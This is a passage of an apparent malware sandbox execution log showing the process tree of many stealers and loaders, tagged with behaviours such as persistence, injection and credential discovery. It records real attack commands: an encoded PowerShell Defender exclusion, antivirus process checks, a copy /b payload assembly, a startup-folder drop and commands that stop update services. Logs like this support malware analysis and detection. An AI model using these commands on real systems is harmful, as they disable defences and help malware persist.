-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate4⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:3784
-
-
-
C:\Users\Admin\Desktop\Files\test5.exe"C:\Users\Admin\Desktop\Files\test5.exe"3⤵PID:5772
-
-
C:\Users\Admin\Desktop\Files\Opdxdyeul.exe"C:\Users\Admin\Desktop\Files\Opdxdyeul.exe"3⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5800 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEQAZQBzAGsAdABvAHAAXABGAGkAbABlAHMAXABPAHAAZAB4AGQAeQBlAHUAbAAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwARABlAHMAawB0AG8AcABcAEYAaQBsAGUAcwBcAE8AcABkAHgAZAB5AGUAdQBsAC4AZQB4AGUAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABZAGoAbAB3AHUAdQB5AHMALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWQBqAGwAdwB1AHUAeQBzAC4AZQB4AGUA4⤵PID:7312
-
-
C:\Users\Admin\Desktop\Files\Opdxdyeul.exe"C:\Users\Admin\Desktop\Files\Opdxdyeul.exe"4⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:8148
-
-
-
C:\Users\Admin\Desktop\Files\ConsiderableWinners.exe"C:\Users\Admin\Desktop\Files\ConsiderableWinners.exe"3⤵
- Checks computer location settings
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:7772 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Dk Dk.cmd & Dk.cmd & exit4⤵PID:1744
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:7216
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"5⤵PID:7376
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:7324
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"5⤵PID:7184
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 2174125⤵
- System Location Discovery: System Language Discovery
PID:7644
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "PlasmaProfessionalConstitutesGuide" Cheaper5⤵PID:5776
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Mailing + Violin + Ethernet + Operated + Lunch + Useful 217412\N5⤵
- System Location Discovery: System Language Discovery
PID:7504
-
-
C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pifPossibly.pif N5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:7616
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
- System Location Discovery: System Language Discovery
PID:7944
-
-
-
-
C:\Users\Admin\Desktop\Files\v7wa24td.exe"C:\Users\Admin\Desktop\Files\v7wa24td.exe"3⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of SetWindowsHookEx
PID:2348 -
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"4⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:7192 -
C:\Windows\system32\chcp.comchcp 650015⤵PID:8144
-
-
C:\Windows\system32\netsh.exenetsh wlan show profiles5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:8072
-
-
C:\Windows\system32\findstr.exefindstr /R /C:"[ ]:[ ]"5⤵PID:8160
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"4⤵PID:8120
-
C:\Windows\system32\chcp.comchcp 650015⤵PID:7540
-
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid5⤵
- Event Triggered Execution: Netsh Helper DLL
PID:6296
-
-
C:\Windows\system32\findstr.exefindstr "SSID BSSID Signal"5⤵PID:8180
-
-
-
-
C:\Users\Admin\Desktop\Files\abc.exe"C:\Users\Admin\Desktop\Files\abc.exe"3⤵PID:7252
-
-
C:\Users\Admin\Desktop\Files\WindowsUI.exe"C:\Users\Admin\Desktop\Files\WindowsUI.exe"3⤵
- Adds Run key to start application
PID:7944
-
-
C:\Users\Admin\Desktop\Files\gagagggagagag.exe"C:\Users\Admin\Desktop\Files\gagagggagagag.exe"3⤵PID:6020
-
-
C:\Users\Admin\Desktop\Files\build_2024-07-27_00-41.exe"C:\Users\Admin\Desktop\Files\build_2024-07-27_00-41.exe"3⤵
- Checks processor information in registry
PID:9600 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9600 -s 14684⤵
- Program crash
PID:9324
-
-
-
C:\Users\Admin\Desktop\Files\frap.exe"C:\Users\Admin\Desktop\Files\frap.exe"3⤵
- Checks computer location settings
- Modifies registry class
PID:7156 -
C:\Users\Admin\Desktop\Files\._cache_frap.exe"C:\Users\Admin\Desktop\Files\._cache_frap.exe"4⤵
- System Location Discovery: System Language Discovery
PID:8232
-
-
-
C:\Users\Admin\Desktop\Files\main.exe"C:\Users\Admin\Desktop\Files\main.exe"3⤵PID:7616
-
C:\Users\Admin\Desktop\Files\main.exe"C:\Users\Admin\Desktop\Files\main.exe"4⤵
- System Location Discovery: System Language Discovery
PID:8980
-
-
-
C:\Users\Admin\Desktop\Files\whiteheroin.exe"C:\Users\Admin\Desktop\Files\whiteheroin.exe"3⤵
- Suspicious use of SetThreadContext
PID:6028 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:9584
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:10200
-
-
-
C:\Users\Admin\Desktop\Files\LummaC222222.exe"C:\Users\Admin\Desktop\Files\LummaC222222.exe"3⤵PID:4032
-
-
C:\Users\Admin\Desktop\Files\install_lodop32.exe"C:\Users\Admin\Desktop\Files\install_lodop32.exe"3⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies registry class
PID:10096
-
-
C:\Users\Admin\Desktop\Files\Bluescreen.exe"C:\Users\Admin\Desktop\Files\Bluescreen.exe"3⤵PID:9328
-
-
C:\Users\Admin\Desktop\Files\LummaC2.exe"C:\Users\Admin\Desktop\Files\LummaC2.exe"3⤵PID:6016
-
-
C:\Users\Admin\Desktop\Files\Sniffthem.exe"C:\Users\Admin\Desktop\Files\Sniffthem.exe"3⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:9224 -
C:\Windows\system32\audiodg.exe"C:\Windows\system32\audiodg.exe"4⤵
- Adds Run key to start application
PID:4896
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"4⤵PID:5600
-
-
C:\Windows\system32\msiexec.exe"C:\Windows\system32\msiexec.exe"4⤵
- Adds Run key to start application
PID:7296
-
-
-
C:\Users\Admin\Desktop\Files\build2.exe"C:\Users\Admin\Desktop\Files\build2.exe"3⤵PID:7216
-
-
C:\Users\Admin\Desktop\Files\Installeraus.exe"C:\Users\Admin\Desktop\Files\Installeraus.exe"3⤵
- System Location Discovery: System Language Discovery
PID:9068 -
C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe"C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe" -fullinstall4⤵
- Sets service image path in registry
- Drops file in Program Files directory
PID:7728 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3952
-
-
-
-
C:\Users\Admin\Desktop\Files\needmoney.exe"C:\Users\Admin\Desktop\Files\needmoney.exe"3⤵PID:10604
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exeC:\Users\Admin\AppData\Local\Temp\svchost015.exe4⤵PID:7048
-
-
-
C:\Users\Admin\Desktop\Files\scheduledllama.exe"C:\Users\Admin\Desktop\Files\scheduledllama.exe"3⤵PID:10872
-
-
C:\Users\Admin\Desktop\Files\DEF.exe"C:\Users\Admin\Desktop\Files\DEF.exe"3⤵PID:11164
-
C:\ProgramData\db\music.exe"C:\ProgramData\db\music.exe"4⤵PID:220
-
\??\c:\program files (x86)\internet explorer\iexplore.exe"c:\program files (x86)\internet explorer\iexplore.exe"5⤵PID:10504
-
-
-
-
C:\Users\Admin\Desktop\Files\ewrvuh.exe"C:\Users\Admin\Desktop\Files\ewrvuh.exe"3⤵PID:11032
-
-
C:\Users\Admin\Desktop\Files\octus.exe"C:\Users\Admin\Desktop\Files\octus.exe"3⤵PID:9636
-
-
C:\Users\Admin\Desktop\Files\random.exe"C:\Users\Admin\Desktop\Files\random.exe"3⤵PID:11244
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"4⤵PID:10380
-
C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"5⤵PID:10412
-
-
C:\Users\Admin\AppData\Local\Temp\1001527001\aqbjn3fl.exe"C:\Users\Admin\AppData\Local\Temp\1001527001\aqbjn3fl.exe"5⤵PID:10520
-
C:\Users\Admin\AppData\Local\Temp\1001527001\aqbjn3fl.exe"C:\Users\Admin\AppData\Local\Temp\1001527001\aqbjn3fl.exe"6⤵PID:5664
-
-
-
C:\Users\Admin\AppData\Local\Temp\1002824001\9f346cc402.exe"C:\Users\Admin\AppData\Local\Temp\1002824001\9f346cc402.exe"5⤵PID:8988
-
-
C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe"C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe"5⤵PID:10632
-
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"6⤵PID:5388
-
C:\Users\Admin\AppData\Local\Temp\10000270101\Javvvum.exe"C:\Users\Admin\AppData\Local\Temp\10000270101\Javvvum.exe"7⤵PID:10720
-
-
C:\Users\Admin\AppData\Local\Temp\10000281101\stail.exe"C:\Users\Admin\AppData\Local\Temp\10000281101\stail.exe"7⤵PID:10580
-
C:\Users\Admin\AppData\Local\Temp\is-JAQK0.tmp\stail.tmp"C:\Users\Admin\AppData\Local\Temp\is-JAQK0.tmp\stail.tmp" /SL5="$230774,3881966,54272,C:\Users\Admin\AppData\Local\Temp\10000281101\stail.exe"8⤵PID:8772
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1003374001\kxfh9qhs.exe"C:\Users\Admin\AppData\Local\Temp\1003374001\kxfh9qhs.exe"5⤵PID:10980
-
-
C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe"C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe"5⤵PID:10832
-
-
C:\Users\Admin\AppData\Local\Temp\1004437001\d36f264390.exe"C:\Users\Admin\AppData\Local\Temp\1004437001\d36f264390.exe"5⤵PID:6960
-
-
C:\Users\Admin\AppData\Local\Temp\1004438001\d30e0af131.exe"C:\Users\Admin\AppData\Local\Temp\1004438001\d30e0af131.exe"5⤵PID:11256
-
-
-
-
C:\Users\Admin\Desktop\Files\Edge.exe"C:\Users\Admin\Desktop\Files\Edge.exe"3⤵PID:10016
-
C:\Users\Admin\AppData\Local\Temp\Edge.exe"C:\Users\Admin\AppData\Local\Temp\Edge.exe"4⤵PID:8308
-
-
-
C:\Users\Admin\Desktop\Files\zxcv.exe"C:\Users\Admin\Desktop\Files\zxcv.exe"3⤵PID:10488
-
C:\Users\Admin\Desktop\Files\zxcv.exe"C:\Users\Admin\Desktop\Files\zxcv.exe"4⤵PID:10804
-
C:\Users\Admin\AppData\Roaming\Isk1MjbS0E.exe"C:\Users\Admin\AppData\Roaming\Isk1MjbS0E.exe"5⤵PID:10728
-
-
C:\Users\Admin\AppData\Roaming\W70OVXGD7k.exe"C:\Users\Admin\AppData\Roaming\W70OVXGD7k.exe"5⤵PID:11184
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10488 -s 3284⤵
- Program crash
PID:10664
-
-
-
-
C:\Windows\system32\mspaint.exe"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\a\screenshot_0.png"2⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:4224
-
-
C:\Windows\system32\mspaint.exe"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\a\screenshot_0.png"2⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:3120
-
-
C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pifC:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif2⤵
- Suspicious use of SetWindowsHookEx
PID:6844
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:6536
-
-
C:\Windows\SYSTEM32\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & echo URL="C:\Users\Admin\AppData\Local\CyberSphere Dynamics\ZeusChat.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & exit2⤵
- Drops startup file
PID:7900
-
-
C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pifC:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif2⤵
- Suspicious use of SetWindowsHookEx
PID:7352 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7352 -s 5403⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:1920
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7352 -s 5563⤵PID:2304
-
-
-
C:\Windows\System32\NOTEPAD.EXE"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Dk.cmd2⤵
- Opens file in notepad (likely ransom note)
PID:7480
-
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\QzMSuoZ4.xlsm"2⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:8300 -
C:\ProgramData\Synaptics\Synaptics.exeC:\ProgramData\Synaptics\Synaptics.exe3⤵PID:7312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Dk.cmd" "2⤵PID:9004
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6388
-
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:8244
-
-
C:\Windows\system32\findstr.exefindstr /I "wrsa.exe opssvc.exe"3⤵PID:9616
-
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:6652
-
-
C:\Windows\system32\findstr.exefindstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"3⤵PID:7876
-
-
C:\Windows\system32\cmd.execmd /c md 2174123⤵PID:1960
-
-
C:\Windows\system32\findstr.exefindstr /V "PlasmaProfessionalConstitutesGuide" Cheaper3⤵PID:9284
-
-
C:\Windows\system32\cmd.execmd /c copy /b Mailing + Violin + Ethernet + Operated + Lunch + Useful 217412\N3⤵PID:8992
-
-
C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pifPossibly.pif N3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of SetThreadContext
PID:7032
-
-
C:\Windows\system32\choice.exechoice /d y /t 53⤵PID:9128
-
-
-
C:\Users\Admin\AppData\Local\Temp\8yHfijNE.exe"C:\Users\Admin\AppData\Local\Temp\8yHfijNE.exe"2⤵PID:5904
-
-
C:\Users\Admin\AppData\Local\Temp\zcgb7ld2.exe"C:\Users\Admin\AppData\Local\Temp\zcgb7ld2.exe"2⤵PID:6464
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Bukkake.cmd" "2⤵PID:8980
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7740
-
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:5980
-
-
C:\Windows\system32\findstr.exefindstr /I "wrsa opssvc"3⤵PID:8616
-
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:8196
-
-
C:\Windows\system32\findstr.exefindstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"3⤵PID:5696
-
-
C:\Windows\system32\cmd.execmd /c md 294423⤵PID:8072
-
-
C:\Windows\system32\cmd.execmd /c copy /b ..\Wendy + ..\Psychiatry + ..\Rid + ..\Games + ..\Norway + ..\Matching + ..\Jungle + ..\Elliott + ..\Jpg + ..\Americans + ..\Exhibits + ..\Peeing + ..\Typical + ..\Innocent + ..\Seafood + ..\Nervous + ..\Households + ..\Ai + ..\Hotel + ..\Holdem + ..\Drums + ..\Carlo + ..\Tm + ..\Landscape + ..\Resolutions + ..\Def + ..\Lambda + ..\Biodiversity + ..\Odds + ..\Smithsonian + ..\Blvd + ..\Actual + ..\Guy + ..\Expert + ..\Delaware + ..\Eagle + ..\Eugene + ..\Exempt + ..\Same + ..\Ebooks + ..\Individuals + ..\Sucking + ..\Chan + ..\Turns + ..\Satin + ..\Dealing + ..\Result + ..\Through + ..\Realized l3⤵PID:10112
-
-
C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.comReynolds.com l3⤵
- Suspicious use of SetThreadContext
PID:748 -
C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.comC:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com4⤵PID:2556
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2556 -s 1845⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6540
-
-
-
-
C:\Windows\system32\choice.exechoice /d y /t 53⤵PID:9336
-
-
-
C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pifC:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif2⤵PID:9288
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 9288 -s 5123⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:9496
-
-
-
C:\Users\Admin\AppData\Local\Temp\DCF6.tmp.x.exe"C:\Users\Admin\AppData\Local\Temp\DCF6.tmp.x.exe"2⤵PID:5404
-
-
C:\Users\Admin\AppData\Local\Temp\EE7C.tmp.zx.exe"C:\Users\Admin\AppData\Local\Temp\EE7C.tmp.zx.exe"2⤵PID:3300
-
C:\Users\Admin\AppData\Local\Temp\EE7C.tmp.zx.exe"C:\Users\Admin\AppData\Local\Temp\EE7C.tmp.zx.exe"3⤵PID:10136
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3572
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3732
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4036
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3604
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4260
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:3508
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:4720
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
PID:4836
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4256
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:1832
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2524
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:3992
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
PID:4680
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1764
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1384
-
C:\Windows\System32\smartscreen.exeC:\Windows\System32\smartscreen.exe -Embedding1⤵PID:4796
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵PID:4808
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4468
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵PID:2836
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
PID:4092 -
C:\Windows\system32\cmd.execmd /c copy "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\Admin\AppData\Local\Temp\Updater.vbs.exe" /Y2⤵
- Process spawned unexpected child process
PID:6680
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:3632 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3084 -ip 30842⤵PID:2700
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5744 -ip 57442⤵PID:5972
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4028 -ip 40282⤵PID:7592
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 616 -p 7352 -ip 73522⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:9180
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 660 -p 7352 -ip 73522⤵PID:7116
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService1⤵PID:4240
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
- Modifies data under HKEY_USERS
PID:2156
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵PID:1160
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:7040
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5936
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:2752
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:4460
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:8132
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:7084
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:6472
-
C:\ProgramData\Mig\Mig.exeC:\ProgramData\Mig\Mig.exe1⤵
- Checks BIOS information in registry
- Suspicious use of SetThreadContext
PID:7304 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6404 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:8048
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:1228
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:5976 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4804
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:1152
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:6792
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:3352 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7624
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:116 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6788
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
PID:5888 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5364
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
PID:6048 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7932
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
PID:7804 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4240
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
PID:7128 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6776
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:4384
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:3716
-
-
C:\Windows\system32\dialer.exedialer.exe2⤵PID:2968
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:6620
-
